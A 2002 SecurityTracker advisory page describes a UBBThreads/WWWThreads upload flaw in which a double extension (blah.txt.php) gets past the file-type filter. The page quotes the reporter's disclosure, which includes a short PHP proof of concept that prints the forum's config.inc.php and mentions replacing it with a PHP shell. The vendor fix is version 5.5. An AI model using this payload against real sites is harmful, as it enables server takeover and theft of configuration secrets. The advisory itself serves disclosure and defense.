Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Report a vulnerability that you have found to SecurityTracker
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
UBBThreads Bulletin Board Application Lets Remote Users With Accounts on the Bulletin Board Upload Files With Prohibited Extensions, Including PHP Scripts Which Can Subsequently Be Executed on the System
|
Date: Jan 31 2002
|
Impact: Execution of arbitrary code via network, Host/resource access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 5.5 Dev11 and prior
|
Description: A vulnerability was reported in Infopop's UBBThreads message board software. A remote user with a valid account on the bulletin
board can upload a file with a file extension that should be blocked. PHP scripts can be uploaded and executed.
It is reported that a remote user with a valid account on the bulletin board application can upload certain file types that are intended
to be blocked from uploading (e.g., .php, .asp, .js, .vbs, .sht, .htm). This is reportedly because of a logic flaw in the code
that checks for file extensions to be allowed and not allowed. A remote user can add a permitted file extension (e.g., .zip, .txt,
.gif, .jpg, .jpeg, .bmp) before the true extension to circumvent the blocking mechanism.
A remote user could upload a PHP file
and then execute that PHP script on the server.
A demonstration exploit example is provided in the Source Message.
|
Impact: A remote user with valid access to a bulletin board account can upload files with file extensions that should be prohibited. This can included PHP files that can then be executed on the server.
|
Solution: The vendor has released a fixed version (5.5).
|
Vendor URL: www.infopop.com/products/ubbthreads/index.html (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (NT), Windows (2000)
|
Reported By: Root Extractor <condor@phreaker.net>
|
Message History:
None.
|
Source Message Contents
|
Date: 30 Jan 2002 22:12:17 -0000
From: Root Extractor <condor@phreaker.net>
Subject: [ WWWThreads, UBBThreads ] Security Hole in upload system
|
[ WWWThreads, UBBThreads ] Security Hole in
upload system
Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com
I. Details
II. Vulnerable ver's
III. Example, Xploit
IV. Solution
Details :
..: config.inc.php :..
------------------------- snip ------------------------------
// $config['excludefiles']
= ".php,.asp,.js,.vbs,.sht,.htm";
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";
------------------------- snip ------------------------------
that files that were not listed in the allow files could
still be uploaded. Seems you checked the extension
but if someone added an allowable extension first
before the bogus extension the file would upload.
vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and piror
not vulnerable :
UBBThreads 5.5
Example :
you allow the upload or .txt,.jpg,.bmp,.zip
all files that don't have those extensions should not
be uploaded
However if somebody changes the name of the file to
blah.txt.php the file will validate and upload......huh !
Xploit :
1) make new file $ touch blah.txt.php
2) edit it $ vi blah.txt.php (in this step, write a php
code, for example)
<?php
$readfile = join("", file
("../config.inc.php"));
print $readfile;
?>
3) save & upload it
4) visit your blah file, now you can to see a config file
of your victim forum
5) i'm replaced readfile code by php shell file
Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/
Copyright 2002 recm security team
http://hop.to/condor
|
|
Go to the Top of This SecurityTracker Archive Page
|
